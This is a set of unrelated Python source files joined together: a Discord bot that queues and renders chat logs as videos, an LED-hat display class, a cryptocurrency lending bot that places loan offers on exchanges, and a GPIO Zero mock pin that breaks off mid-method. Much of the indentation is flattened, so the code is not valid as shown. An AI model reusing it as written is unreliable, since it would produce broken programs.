@courtBot.command()
@commands.is_owner()
async def queue(context):
filename = "queue.txt"
with open(filename, 'w', encoding="utf-8") as queue:
global renderQueue
renderQueueSize = len(renderQueue)
queue.write(f"There are {renderQueueSize} item(s) in the queue!\n")
for positionInQueue, render in enumerate(iterable=renderQueue):
queue.write(f"\n#{positionInQueue:04}\n")
try: queue.write(f"Requested by: {render.getContext().author.name}#{render.getContext().author.discriminator}\n")
except: pass
try: queue.write(f"Number of messages: {len(render.getMessages())}\n")
except: pass
try: queue.write(f"Guild: {render.getFeedbackMessage().channel.guild.name}\n")
except: pass
try: queue.write(f"Channel: #{render.getFeedbackMessage().channel.name}\n")
except: pass
try: queue.write(f"State: {render.getStateString()}\n")
except: pass
await context.send(file=discord.File(filename))
clean([], filename)
@courtBot.command()
async def render(context, numberOfMessages: int):
global renderQueue
feedbackMessage = await context.send(content="`Fetching messages...`")
try:
if not (numberOfMessages in range(1, 151)):
raise Exception("Number of messages must be between 1 and 150")
        # baseMessage is the message from which the specified number of messages will be fetched, not including itself
baseMessage = context.message.reference.resolved if context.message.reference else context.message
courtMessages = []
discordMessages = []
        # If the render command was executed within a reply (baseMessage and context.message aren't the same), we want
        # to append the message the user replied to (baseMessage) to the 'discordMessages' list and subtract 1 from
        # 'numberOfMessages'; that way we take the added baseMessage into account and avoid fetching 1 extra message.
if not baseMessage.id == context.message.id:
numberOfMessages = numberOfMessages - 1
discordMessages.append(baseMessage)
# This will append all messages to the already existing discordMessages, if the message was a reply it should already
# include one message (the one it was replying to), if not: it will be empty at this point.
discordMessages += await context.channel.history(limit=numberOfMessages, oldest_first=False, before=baseMessage).flatten()
for discordMessage in discordMessages:
message = Message(discordMessage)
if message.text.strip():
courtMessages.insert(0, message.to_Comment())
if len(courtMessages) < 1:
raise Exception("There should be at least one person in the conversation.")
newRender = Render(State.QUEUED, context, feedbackMessage, courtMessages)
renderQueue.append(newRender)
except Exception as exception:
        exceptionEmbed = discord.Embed(description=str(exception), color=0xff0000)
await feedbackMessage.edit(content="", embed=exceptionEmbed)
addToDeletionQueue(feedbackMessage)
@tasks.loop(seconds=1)
async def deletionQueueLoop():
global deletionQueue
deletionQueueSize = len(deletionQueue)
# Delete message and remove from queue if remaining time is less than (or equal to) 0
if deletionQueueSize > 0:
for index in reversed(range(deletionQueueSize)):
if await deletionQueue[index].update():
deletionQueue.pop(index)
@tasks.loop(seconds=5)
async def renderQueueLoop():
global renderQueue
renderQueueSize = len(renderQueue)
await changeActivity(f"{prefix}help | queue: {renderQueueSize}")
for positionInQueue, render in enumerate(iterable=renderQueue, start=1):
try:
if render.getState() == State.QUEUED:
newFeedback = f"""
`Fetching messages... Done!`
`Position in the queue: #{(positionInQueue)}`
"""
await render.updateFeedback(newFeedback)
if render.getState() == State.INPROGRESS:
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated...`
"""
await render.updateFeedback(newFeedback)
if render.getState() == State.FAILED:
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated... Failed!`
"""
await render.updateFeedback(newFeedback)
render.setState(State.DONE)
if render.getState() == State.RENDERED:
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated... Done!`
`Uploading file to Discord...`
"""
await render.updateFeedback(newFeedback)
render.setState(State.UPLOADING)
                # If the file size is lower than the maximum file size allowed in this guild, upload it to Discord
fileSize = os.path.getsize(render.getOutputFilename())
if fileSize < render.getContext().channel.guild.filesize_limit:
await render.getContext().send(content=render.getContext().author.mention, file=discord.File(render.getOutputFilename()))
render.setState(State.DONE)
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated... Done!`
`Uploading file to Discord... Done!`
"""
await render.updateFeedback(newFeedback)
else:
try:
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated... Done!`
                        `Video file too big for your server! {round(fileSize/1000000, 2)} MB`
`Trying to upload file to an external server...`
"""
await render.updateFeedback(newFeedback)
with open(render.getOutputFilename(), 'rb') as videoFile:
files = {'files[]': (render.getOutputFilename(), videoFile)}
response = requests.post('https://uguu.se/upload.php?output=text', files=files).content.decode("utf-8").strip()
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated... Done!`
                        `Video file too big for your server! {round(fileSize/1000000, 2)} MB`
`Trying to upload file to an external server... Done!`
"""
await render.updateFeedback(newFeedback)
await render.getContext().send(content=f"{render.getContext().author.mention}\n{response}\n_This video will be deleted in 48 hours_")
render.setState(State.DONE)
except Exception as exception:
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated... Done!`
                        `Video file too big for your server! {round(fileSize/1000000, 2)} MB`
`Trying to upload file to an external server... Failed!`
"""
await render.updateFeedback(newFeedback)
                        exceptionEmbed = discord.Embed(description=str(exception), color=0xff0000)
exceptionMessage = await render.getContext().send(embed=exceptionEmbed)
addToDeletionQueue(exceptionMessage)
render.setState(State.DONE)
except Exception as exception:
print(f"Error: {exception}")
try:
render.setState(State.DONE)
except:
pass
finally:
if render.getState() == State.DONE:
clean(render.getMessages(), render.getOutputFilename())
addToDeletionQueue(render.getFeedbackMessage())
# Remove from queue if state is DONE
if renderQueueSize > 0:
for index in reversed(range(renderQueueSize)):
if renderQueue[index].getState() == State.DONE:
renderQueue.pop(index)
@courtBot.event
async def on_ready():
global currentActivityText
print("Bot is ready!")
print(f"Logged in as {courtBot.user.name}#{courtBot.user.discriminator} ({courtBot.user.id})")
currentActivityText = f"{prefix}help"
renderQueueLoop.start()
deletionQueueLoop.start()
def clean(thread: List[Comment], filename):
try:
os.remove(filename)
except Exception as exception:
print(f"Error: {exception}")
try:
for comment in thread:
if (comment.evidence_path is not None):
                os.remove(comment.evidence_path)
except Exception as exception:
print(f"Error: {exception}")
def renderThread():
global renderQueue
while True:
time.sleep(2)
try:
for render in renderQueue:
if render.getState() == State.QUEUED:
render.setState(State.INPROGRESS)
try:
render_comment_list(render.getMessages(), render.getOutputFilename())
render.setState(State.RENDERED)
except Exception as exception:
print(f"Error: {exception}")
render.setState(State.FAILED)
finally:
break
except Exception as exception:
print(f"Error: {exception}")
backgroundThread = threading.Thread(target=renderThread, name="RenderThread")
backgroundThread.start()
# Even though Python threads do not run CPU-bound work concurrently (because of the GIL), the rendering process
# does a lot of disk I/O, so having two threads may help speed things up.
backgroundThread2 = threading.Thread(target=renderThread, name="RenderThread2")
backgroundThread2.start()
courtBot.run(token)
backgroundThread.join()
backgroundThread2.join()
|
ledhat.py
|
#!/usr/bin/env python3
# coding=utf8
import os
import time
import colorsys
import threading
import _thread
from sys import exit, argv
try:
from PIL import Image, ImageDraw, ImageFont
except ImportError:
exit('Lemon requires the pillow module\nInstall with: sudo pip3 install pillow')
try:
import unicornhathd as unicorn
print("unicorn hat hd detected")
except ImportError:
from unicorn_hat_sim import unicornhathd as unicorn
class LedHat:
def __init__(self):
self._lock_ui = _thread.allocate_lock()
unicorn.rotation(270)
unicorn.brightness(1)
self._unicorn_width, self._unicorn_height = unicorn.get_shape()
self._default_font_file = 'fonts/Hack-Regular.ttf'
self._default_font_size = 12
self._default_font = ImageFont.truetype(self._default_font_file, self._default_font_size)
def _animate_icon(self, image, repeat=3, cycle_time=0.10):
        if image is None or not isinstance(image, Image.Image):
            print("Not an image:", image)
            return
self._lock_ui.acquire()
for i in range(0, repeat):
# this is the original pimoroni function for drawing sprites
for o_x in range(int(image.size[0] / self._unicorn_width)):
for o_y in range(int(image.size[1] / self._unicorn_height)):
valid = False
for x in range(self._unicorn_width):
for y in range(self._unicorn_height):
pixel = image.getpixel(((o_x * self._unicorn_width) + y, (o_y * self._unicorn_height) + x))
r, g, b = int(pixel[0]), int(pixel[1]), int(pixel[2])
if r or g or b:
valid = True
unicorn.set_pixel((self._unicorn_height - y - 1), x, r, g, b)
if valid:
unicorn.show()
time.sleep(cycle_time)
unicorn.off()
self._lock_ui.release()
def _animate_text(self, line, cycle_time=0.10, font=None):
        if line is None or not isinstance(line, str):
            print("Not a string:", line)
            return
self._lock_ui.acquire()
text_font = self._default_font
        if font is not None:
            # TODO: Check whether file exists
            custom_font_file = 'fonts/' + font + '.ttf'
            try:
                text_font = ImageFont.truetype(custom_font_file, self._default_font_size)
            except IOError:
                text_font = self._default_font
text_width = self._unicorn_width
text_height = 0
text_x = self._unicorn_width
text_y = 2
w, h = text_font.getsize(line)
text_width += w + self._unicorn_width
text_height = max(text_height, h)
text_width += self._unicorn_width + text_x + 1
image = Image.new('RGB', (text_width, max(16, text_height)), (0, 0, 0))
draw = ImageDraw.Draw(image)
offset_left = 0
        draw.text((text_x + offset_left, text_y), line, font=text_font, fill=(255, 255, 255, 255))
        offset_left += text_font.getsize(line)[0] + self._unicorn_width
for scroll in range(text_width - self._unicorn_width):
for x in range(self._unicorn_width):
for y in range(self._unicorn_height):
pixel = image.getpixel((x + scroll, y))
r, g, b = [int(n) for n in pixel]
unicorn.set_pixel(self._unicorn_width - 1 - x, y, r, g, b)
unicorn.show()
time.sleep(cycle_time / 5)
unicorn.off()
self._lock_ui.release()
def icon(self, name, repeat=3, cycle_time=0.10):
# TODO: Check whether file exists
img = Image.open('icons/' + name + '.png')
self._thread_icon = threading.Thread(target=self._animate_icon, args=(img,repeat,cycle_time,))
self._thread_icon.daemon = True
self._thread_icon.start()
time.sleep(.05)
def text(self, line, cycle_time=0.10, font=None):
self._thread_text = threading.Thread(target=self._animate_text, args=(line,cycle_time,font,))
self._thread_text.daemon = True
self._thread_text.start()
time.sleep(.05)
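# Minimal usage sketch (not part of the original module): it assumes a sprite sheet
# at 'icons/heart.png' and the 'fonts/Hack-Regular.ttf' font referenced above exist
# next to this file; both asset names are placeholders.
if __name__ == '__main__':
    hat = LedHat()
    hat.icon('heart', repeat=2)            # sprite animation runs on a daemon thread
    hat.text('Hello from the LED hat!')    # scrolls once the icon releases the UI lock
    time.sleep(15)                         # keep the main thread alive while the daemon threads animate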
|
Lending.py
|
# coding=utf-8
from decimal import Decimal
import sched
import time
import threading
Config = None
api = None
log = None
Data = None
MaxToLend = None
Analysis = None
SATOSHI = Decimal(10) ** -8
sleep_time_active = 0
sleep_time_inactive = 0
sleep_time = 0
min_daily_rate = 0
max_daily_rate = 0
spread_lend = 0
gap_bottom_default = 0
gap_top_default = 0
xday_threshold = 0
xday_spread = 0
xdays = 0
min_loan_size = 0
min_loan_sizes = {}
end_date = None
coin_cfg = {}
dry_run = 0
transferable_currencies = []
currencies_to_analyse = []
keep_stuck_orders = True
hide_coins = True
coin_cfg_alerted = {}
max_active_alerted = {}
notify_conf = {}
loans_provided = {}
gap_mode_default = ""
scheduler = None
exchange = None
frrasmin = False
frrdelta = 0.0
# limit of orders to request
loanOrdersRequestLimit = {}
defaultLoanOrdersRequestLimit = 100
def init(cfg, api1, log1, data, maxtolend, dry_run1, analysis, notify_conf1):
global Config, api, log, Data, MaxToLend, Analysis, notify_conf
Config = cfg
api = api1
log = log1
Data = data
MaxToLend = maxtolend
Analysis = analysis
notify_conf = notify_conf1
global sleep_time, sleep_time_active, sleep_time_inactive, min_daily_rate, max_daily_rate, spread_lend, \
gap_bottom_default, gap_top_default, xday_threshold, xday_spread, xdays, min_loan_size, end_date, coin_cfg, \
min_loan_sizes, dry_run, transferable_currencies, keep_stuck_orders, hide_coins, scheduler, gap_mode_default, \
exchange, analysis_method, currencies_to_analyse, all_currencies, frrasmin, frrdelta
exchange = Config.get_exchange()
sleep_time_active = float(Config.get("BOT", "sleeptimeactive", None, 1, 3600))
sleep_time_inactive = float(Config.get("BOT", "sleeptimeinactive", None, 1, 3600))
exchangeMax = 7 if exchange == 'BITFINEX' else 5
min_daily_rate = Decimal(Config.get("BOT", "mindailyrate", None, 0.002, exchangeMax)) / 100
max_daily_rate = Decimal(Config.get("BOT", "maxdailyrate", None, 0.002, exchangeMax)) / 100
spread_lend = int(Config.get("BOT", "spreadlend", None, 1, 20))
gap_mode_default = Config.get_gap_mode("BOT", "gapMode")
gap_bottom_default = Decimal(Config.get("BOT", "gapbottom", None, 0))
gap_top_default = Decimal(Config.get("BOT", "gaptop", None, gap_bottom_default))
xday_threshold = float(Config.get("BOT", "xdaythreshold", None, 0.002, 5)) / 100
xday_spread = float(Config.get('BOT', 'xdayspread', 0, 0, 10))
maxPeriod = 120 if exchange == 'BITFINEX' else 60
xdays = str(Config.get("BOT", "xdays", None, 2, maxPeriod))
min_loan_size = Decimal(Config.get("BOT", 'minloansize', None, 0.01))
end_date = Config.get('BOT', 'endDate')
coin_cfg = Config.get_coin_cfg()
min_loan_sizes = Config.get_min_loan_sizes()
dry_run = dry_run1
transferable_currencies = Config.get_currencies_list('transferableCurrencies')
all_currencies = Config.get_all_currencies()
currencies_to_analyse = Config.get_currencies_list('analyseCurrencies', 'MarketAnalysis')
keep_stuck_orders = Config.getboolean('BOT', "keepstuckorders", True)
hide_coins = Config.getboolean('BOT', 'hideCoins', True)
frrasmin = Config.getboolean('BOT', 'frrasmin', False)
frrdelta = Decimal(Config.get('BOT', 'frrdelta', 0.0000))
analysis_method = Config.get('Daily_min', 'method', 'percentile')
if analysis_method not in ['percentile', 'MACD']:
raise ValueError("analysis_method: \"{0}\" is not valid, must be percentile or MACD".format(analysis_method))
sleep_time = sleep_time_active # Start with active mode
# create the scheduler thread
scheduler = sched.scheduler(time.time, time.sleep)
if notify_conf['notify_summary_minutes']:
        # Wait 10 seconds before firing the first summary notification, then use the config time value for future updates
scheduler.enter(10, 1, notify_summary, (notify_conf['notify_summary_minutes'] * 60, ))
if notify_conf['notify_new_loans']:
scheduler.enter(20, 1, notify_new_loans, (60, ))
if not scheduler.empty():
t = threading.Thread(target=scheduler.run)
t.start()
def get_sleep_time():
return sleep_time
def set_sleep_time(usable):
global sleep_time
if usable == 0: # After loop, if no currencies had enough to lend, use inactive sleep time.
sleep_time = sleep_time_inactive
else: # Else, use active sleep time.
sleep_time = sleep_time_active
def notify_summary(sleep_time):
try:
log.notify(Data.stringify_total_lent(*Data.get_total_lent()), notify_conf)
    except Exception as ex:
        print("Error during summary notification: {0}".format(str(ex)))
scheduler.enter(sleep_time, 1, notify_summary, (sleep_time, ))
def notify_new_loans(sleep_time):
global loans_provided
try:
new_provided = api.return_active_loans()['provided']
if loans_provided:
# function to return a set of ids from the api result
# get_id_set = lambda loans: set([x['id'] for x in loans])
def get_id_set(loans):
return set([x['id'] for x in loans])
loans_amount = {}
loans_info = {}
for loan_id in get_id_set(new_provided) - get_id_set(loans_provided):
loan = [x for x in new_provided if x['id'] == loan_id][0]
# combine loans with the same rate
k = 'c' + loan['currency'] + 'r' + loan['rate'] + 'd' + str(loan['duration'])
loans_amount[k] = float(loan['amount']) + (loans_amount[k] if k in loans_amount else 0)
loans_info[k] = loan
# send notifications with the grouped info
            for k, amount in loans_amount.items():
loan = loans_info[k]
t = "{0} {1} loan filled for {2} days at a rate of {3:.4f}%"
text = t.format(amount, loan['currency'], loan['duration'], float(loan['rate']) * 100)
log.notify(text, notify_conf)
loans_provided = new_provided
    except Exception as ex:
        print("Error during new loans notification: {0}".format(str(ex)))
scheduler.enter(sleep_time, 1, notify_new_loans, (sleep_time, ))
def get_min_loan_size(currency):
if currency not in min_loan_sizes:
return min_loan_size
return Decimal(min_loan_sizes[currency])
def create_lend_offer(currency, amt, rate):
days = '2'
if float(rate) > 0.0001:
        rate = float(rate) - 0.000001  # lend offer just below the competing one
amt = "%.8f" % Decimal(amt)
if xday_threshold > 0:
if float(rate) >= xday_threshold:
days = xdays
elif xday_spread and xday_spread > 0:
xday_threshold_min = xday_threshold / xday_spread
if float(rate) > xday_threshold_min:
m = (float(xdays) - 2) / (xday_threshold - xday_threshold_min)
days = str(int(round(m * (float(rate) - xday_threshold_min) + 2)))
if Config.has_option('BOT', 'endDate'):
days_remaining = int(Data.get_max_duration(end_date, "order"))
if int(days_remaining) <= 2:
print("endDate reached. Bot can no longer lend.\nExiting...")
log.log("The end date has almost been reached and the bot can no longer lend. Exiting.")
log.refreshStatus(Data.stringify_total_lent(*Data.get_total_lent()), Data.get_max_duration(
end_date, "status"))
log.persistStatus()
exit(0)
if int(days) > days_remaining:
days = str(days_remaining)
if not dry_run:
msg = api.create_loan_offer(currency, amt, days, 0, rate)
if days == xdays and notify_conf['notify_xday_threshold']:
            text = "{0} {1} loan placed for {2} days at a rate of {3:.4f}%".format(amt, currency, days, float(rate) * 100)
log.notify(text, notify_conf)
log.offer(amt, currency, rate, days, msg)
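# Worked example of the xday scaling above (illustrative numbers, not config
# defaults): with xdays = 60, xday_threshold = 0.02 (2%/day) and xday_spread = 2,
# the threshold_min is 0.01, so a 1.5%/day offer gets
# days = round(((60 - 2) / (0.02 - 0.01)) * (0.015 - 0.01) + 2) = 31,
# while anything at or above 2%/day is offered for the full 60 days.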
def cancel_all():
loan_offers = api.return_open_loan_offers()
available_balances = api.return_available_account_balances('lending')
for CUR in loan_offers:
if CUR in coin_cfg and coin_cfg[CUR]['maxactive'] == 0:
# don't cancel disabled coin
continue
if keep_stuck_orders:
lending_balances = available_balances['lending']
if isinstance(lending_balances, dict) and CUR in lending_balances:
cur_sum = float(available_balances['lending'][CUR])
else:
cur_sum = 0
for offer in loan_offers[CUR]:
cur_sum += float(offer['amount'])
else:
cur_sum = float(get_min_loan_size(CUR)) + 1
if cur_sum >= float(get_min_loan_size(CUR)):
for offer in loan_offers[CUR]:
if not dry_run:
try:
msg = api.cancel_loan_offer(CUR, offer['id'])
log.cancelOrder(CUR, msg)
                    except Exception as ex:
                        log.log("Error canceling loan offer: {0}".format(str(ex)))
else:
print("Not enough " + CUR + " to lend if bot canceled open orders. Not cancelling.")
def lend_all():
total_lent = Data.get_total_lent()[0]
lending_balances = api.return_available_account_balances("lending")['lending']
if dry_run: # just fake some numbers, if dryrun (testing)
lending_balances = Data.get_on_order_balances()
    # Fill in the (maxToLend) balances in botlog.json so they can be displayed on the web
for cur in sorted(total_lent):
if len(lending_balances) == 0 or cur not in lending_balances:
MaxToLend.amount_to_lend(total_lent[cur], cur, 0, 0)
usable_currencies = 0
global sleep_time # We need global var to edit sleeptime
if gap_mode_default == "rawbtc":
ticker = api.return_ticker() # Only call ticker once for all orders
else:
ticker = False
for cur1 in coin_cfg:
if "rawbtc" in cur1:
ticker = api.return_ticker()
break
try:
for cur in lending_balances:
if cur in all_currencies:
usable_currencies += lend_cur(cur, total_lent, lending_balances, ticker)
    except StopIteration:  # Restart lending if we stopped early to raise the request limit.
lend_all()
set_sleep_time(usable_currencies)
def get_frr_or_min_daily_rate(cur):
"""
Checks the Flash Return Rate of cur against the min daily rate and returns the better of the two. If not using
bitfinex then it will always return the min daily rate for the currency.
    :param cur: The currency to check
:return: The better of the two rates (FRR and min daily rate)
"""
if cur in coin_cfg:
min_daily_rate = Decimal(coin_cfg[cur]['minrate'])
frrasmin = coin_cfg[cur]['frrasmin']
frrdelta = Decimal(coin_cfg[cur]['frrdelta']) / 100
else:
min_daily_rate = Decimal(Config.get("BOT", "mindailyrate", None, 0.002, 5)) / 100
frrasmin = Config.getboolean('BOT', 'frrasmin', False)
frrdelta = Decimal(Config.get('BOT', 'frrdelta', 0.0000))
if exchange == 'BITFINEX' and frrasmin:
frr_rate = Decimal(api.get_frr(cur)) + frrdelta
if frr_rate > min_daily_rate:
log.log("Using FRR as mindailyrate {0}% for {1}".format(frr_rate * 100, cur))
return frr_rate
return min_daily_rate
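# Example (illustrative values): on Bitfinex with frrasmin enabled, a configured
# mindailyrate of 0.0005 (0.05%/day) and an FRR of 0.0008 (with frrdelta 0) makes
# this return 0.0008; off Bitfinex, or with a lower FRR, it returns 0.0005.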
def get_min_daily_rate(cur):
cur_min_daily_rate = get_frr_or_min_daily_rate(cur)
if cur in coin_cfg:
if coin_cfg[cur]['maxactive'] == 0:
if cur not in max_active_alerted: # Only alert once per coin.
max_active_alerted[cur] = True
log.log('maxactive amount for ' + cur + ' set to 0, won\'t lend.')
return False
if cur not in coin_cfg_alerted: # Only alert once per coin.
coin_cfg_alerted[cur] = True
log.log('Using custom mindailyrate ' + str(cur_min_daily_rate * 100) + '% for ' + cur)
if Analysis and cur in currencies_to_analyse:
recommended_min = Analysis.get_rate_suggestion(cur, method=analysis_method)
if cur_min_daily_rate < recommended_min:
log.log("Using {0} as mindailyrate {1}% for {2}".format(analysis_method, recommended_min * 100, cur))
cur_min_daily_rate = recommended_min
return Decimal(cur_min_daily_rate)
def construct_order_book(active_cur):
# make sure we have a request limit for this currency
if active_cur not in loanOrdersRequestLimit:
loanOrdersRequestLimit[active_cur] = defaultLoanOrdersRequestLimit
loans = api.return_loan_orders(active_cur, loanOrdersRequestLimit[active_cur])
if len(loans) == 0:
return False
rate_book = []
volume_book = []
for offer in loans['offers']:
rate_book.append(offer['rate'])
volume_book.append(offer['amount'])
return {'rates': rate_book, 'volumes': volume_book}
def get_gap_rate(active_cur, gap, order_book, cur_total_balance, raw=False):
if raw:
gap_expected = gap
else:
gap_expected = gap * cur_total_balance / Decimal(100.0)
gap_sum = 0
i = 0
while gap_sum < gap_expected:
if i == len(order_book['volumes']) - 1 and len(order_book['volumes']) == loanOrdersRequestLimit[active_cur]:
loanOrdersRequestLimit[active_cur] += defaultLoanOrdersRequestLimit
log.log(active_cur + ': Not enough offers in response, adjusting request limit to ' + str(
loanOrdersRequestLimit[active_cur]))
raise StopIteration
elif i == len(order_book['volumes']) - 1:
return max_daily_rate
gap_sum += float(order_book['volumes'][i])
i += 1
return Decimal(order_book['rates'][i])
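# Worked example (illustrative): in "relative" mode with gap = 10 and a total
# balance of 50, gap_expected = 10 * 50 / 100 = 5, so the function sums offer
# volumes down the order book until the cumulative volume reaches 5 and then
# returns the rate of the next offer in the book; with raw=True the gap is
# treated directly as a volume in the lent currency instead of a percentage.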
def get_cur_spread(spread, cur_active_bal, active_cur):
cur_spread_lend = int(spread) # Checks if active_bal can't be spread that many times, and may go down to 1.
cur_min_loan_size = get_min_loan_size(active_cur)
while cur_active_bal < (cur_spread_lend * cur_min_loan_size):
cur_spread_lend -= 1
return int(cur_spread_lend)
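# Example (illustrative): with spreadlend = 5, a lendable balance of 0.025 and a
# minimum loan size of 0.01, the spread collapses from 5 to 2 so that every
# resulting order still meets the 0.01 minimum.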
def construct_orders(cur, cur_active_bal, cur_total_balance, ticker):
cur_spread = get_cur_spread(spread_lend, cur_active_bal, cur)
top_rate, bottom_rate = get_gap_mode_rates(cur, cur_active_bal, cur_total_balance, ticker)
gap_diff = top_rate - bottom_rate
if cur_spread == 1:
rate_step = 0
else:
rate_step = gap_diff / (cur_spread - 1)
order_rates = []
i = 0
while i < cur_spread:
new_rate = bottom_rate + (rate_step * i)
order_rates.append(new_rate)
i += 1
    # Cap any rate above the maximum at max_daily_rate (duplicates are removed below)
    order_rates = [rate if rate <= max_daily_rate else max_daily_rate for rate in order_rates]
new_order_rates = sorted(list(set(order_rates)))
new_order_amounts = []
i = 0
while i < len(new_order_rates):
new_amount = Data.truncate(cur_active_bal / len(new_order_rates), 8)
new_order_amounts.append(Decimal(new_amount))
i += 1
remainder = cur_active_bal - sum(new_order_amounts)
if remainder > 0: # If truncating causes remainder, add that to first order.
new_order_amounts[0] += remainder
return {'amounts': new_order_amounts, 'rates': new_order_rates}
def get_gap_mode_rates(cur, cur_active_bal, cur_total_balance, ticker):
global gap_mode_default, gap_bottom_default, gap_top_default # To be able to change them later if needed.
gap_mode, gap_bottom, gap_top = gap_mode_default, gap_bottom_default, gap_top_default
use_gap_cfg = False
order_book = construct_order_book(cur)
if cur in coin_cfg: # Get custom values specific to coin
cfg = coin_cfg[cur]
if cfg.get('gapmode', False) and cfg.get('gapbottom', False) and cfg.get('gaptop', False):
# Only overwrite default if all three are set
use_gap_cfg = True
gap_mode = cfg['gapmode']
gap_bottom = cfg['gapbottom']
gap_top = cfg['gaptop']
if gap_mode == "rawbtc":
btc_value = 1
if cur != 'BTC':
for coin in ticker:
if coin == 'BTC_' + str(cur).upper():
btc_value = Decimal(ticker[coin]['last'])
break
bottom_depth = gap_bottom / btc_value # Converts from BTC to altcoin's value
bottom_rate = get_gap_rate(cur, bottom_depth, order_book, cur_total_balance, True)
top_depth = gap_top / btc_value
top_rate = get_gap_rate(cur, top_depth, order_book, cur_total_balance, True)
elif gap_mode == "raw": # Value stays in altcoin
bottom_rate = get_gap_rate(cur, gap_bottom, order_book, cur_total_balance, True)
top_rate = get_gap_rate(cur, gap_top, order_book, cur_total_balance, True)
elif gap_mode == "relative":
bottom_rate = get_gap_rate(cur, gap_bottom, order_book, cur_total_balance)
top_rate = get_gap_rate(cur, gap_top, order_book, cur_total_balance)
else:
if use_gap_cfg:
print(f'WARN: Invalid setting for gapMode for {cur}, using defaults...')
coin_cfg[cur]['gapmode'] = "rawbtc"
coin_cfg[cur]['gapbottom'] = 10
coin_cfg[cur]['gaptop'] = 100
else:
print("WARN: Invalid setting for gapMode, using defaults...")
gap_mode_default = "relative"
gap_bottom_default = 10
gap_top_default = 200
return get_gap_mode_rates(cur, cur_active_bal, cur_total_balance, ticker) # Start over with new defaults
return [Decimal(top_rate), Decimal(bottom_rate)]
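# Gap-mode summary (sketch of the three branches above): "relative" reads
# gapbottom/gaptop as percentages of the currency's total lending balance,
# "raw" reads them as absolute volumes in the lent coin, and "rawbtc" reads
# them as BTC volumes and converts through the ticker's BTC_<coin> last price
# before the depth lookup.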
def lend_cur(active_cur, total_lent, lending_balances, ticker):
active_cur_total_balance = Decimal(lending_balances[active_cur])
if active_cur in total_lent:
active_cur_total_balance += Decimal(total_lent[active_cur])
# min daily rate can be changed per currency
cur_min_daily_rate = get_min_daily_rate(active_cur)
# log total coin
log.updateStatusValue(active_cur, "totalCoins", (Decimal(active_cur_total_balance)))
order_book = construct_order_book(active_cur)
if not order_book or len(order_book['rates']) == 0 or not cur_min_daily_rate:
return 0
active_bal = MaxToLend.amount_to_lend(active_cur_total_balance, active_cur, Decimal(lending_balances[active_cur]),
Decimal(order_book['rates'][0]))
if float(active_bal) >= get_min_loan_size(active_cur): # Make sure sleeptimer is set to active if any cur can lend.
currency_usable = 1
else:
return 0 # Return early to end function.
orders = construct_orders(active_cur, active_bal, active_cur_total_balance, ticker) # Build all potential orders
i = 0
while i < len(orders['amounts']): # Iterate through prepped orders and create them if they work
below_min = Decimal(orders['rates'][i]) < Decimal(cur_min_daily_rate)
if hide_coins and below_min:
log.log("Not lending {:s} due to rate below {:.4f}% (actual: {:.4f}%)"
.format(active_cur, (cur_min_daily_rate * 100), (orders['rates'][i] * 100)))
return 0
elif below_min:
rate = str(cur_min_daily_rate)
else:
rate = orders['rates'][i]
try:
create_lend_offer(active_cur, orders['amounts'][i], rate)
except Exception as msg:
if "Amount must be at least " in str(msg):
import re
                results = re.findall(r'[-+]?([0-9]*\.[0-9]+|[0-9]+)', str(msg))
for result in results:
if result:
min_loan_sizes[active_cur] = float(result)
log.log(active_cur + "'s min_loan_size has been increased to the detected min: " + result)
return lend_cur(active_cur, total_lent, lending_balances, ticker) # Redo cur with new min.
else:
                raise
i += 1 # Finally, move to next order.
return currency_usable
def transfer_balances():
# Transfers all balances on the included list to Lending.
if len(transferable_currencies) > 0:
exchange_balances = api.return_balances() # This grabs only exchange balances.
        for coin in list(transferable_currencies):  # iterate over a copy: entries may be removed below
if coin in exchange_balances and Decimal(
exchange_balances[coin]) > 0:
msg = api.transfer_balance(coin, exchange_balances[coin], 'exchange', 'lending')
log.log(log.digestApiMsg(msg))
log.notify(log.digestApiMsg(msg), notify_conf)
if coin not in exchange_balances:
print("WARN: Incorrect coin entered for transferCurrencies: " + coin)
transferable_currencies.remove(coin)
|
mock.py
|
# vim: set fileencoding=utf-8:
#
# GPIO Zero: a library for controlling the Raspberry Pi's GPIO pins
#
# Copyright (c) 2016-2021 Dave Jones <dave@waveform.org.uk>
# Copyright (c) 2016 Andrew Scheller <github@loowis.durge.org>
#
# SPDX-License-Identifier: BSD-3-Clause
import os
from collections import namedtuple
from time import time, sleep, monotonic
from threading import Thread, Event
from math import isclose
import pkg_resources
from ..exc import (
PinPWMUnsupported,
PinSetInput,
PinFixedPull,
PinInvalidFunction,
PinInvalidPull,
PinInvalidBounce,
)
from ..devices import Device
from ..mixins import SharedMixin
from . import SPI
from .pi import PiPin, PiFactory
from .spi import SPISoftware
PinState = namedtuple('PinState', ('timestamp', 'state'))
class MockPin(PiPin):
"""
A mock pin used primarily for testing. This class does *not* support PWM.
"""
def __init__(self, factory, number):
super().__init__(factory, number)
self._function = 'input'
self._pull = 'up' if self.factory.pi_info.pulled_up(repr(self)) else 'floating'
self._state = self._pull == 'up'
self._bounce = None
self._edges = 'both'
self._when_changed = None
self.clear_states()
def close(self):
self.when_changed = None
self.function = 'input'
def _get_function(self):
return self._function
def _set_function(self, value):
if value not in ('input', 'output'):
raise PinInvalidFunction('function must be input or output')
self._function = value
if value == 'input':
# Drive the input to the pull
self._set_pull(self._get_pull())
def _get_state(self):
return self._state
def _set_state(self, value):
if self._function == 'input':
raise PinSetInput('cannot set state of pin {self!r}'.format(
self=self))
assert self._function == 'output'
assert 0 <= value <= 1
self._change_state(bool(value))
def _change_state(self, value):
if self._state != value:
t = monotonic()
self._state = value
self.states.append(PinState(t - self._last_change, value))
self._last_change = t
return True
return False
def _get_frequency(self):
return None
def _set_frequency(self, value):
if value is not None:
raise PinPWMUnsupported()
def _get_pull(self):
return self._pull
def _set_pull(self, value):
if self.function != 'input':
raise PinFixedPull(
'cannot set pull on non-input pin {self!r}'.format(self=self))
if value != 'up' and self.factory.pi_info.pulled_up(repr(self)):
raise PinFixedPull(
'{self!r} has a physical pull-up resistor'.format(self=self))
if value not in ('floating', 'up', 'down'):
raise PinInvalidPull('pull must be floating, up, or down')
self._pull = value
if value == 'up':
self.drive_high()
elif value == 'down':
self.drive_low()
def _get_bounce(self):
return self._bounce
def _set_bounce(self, value):
# XXX Need to implement this
if value is not None:
try:
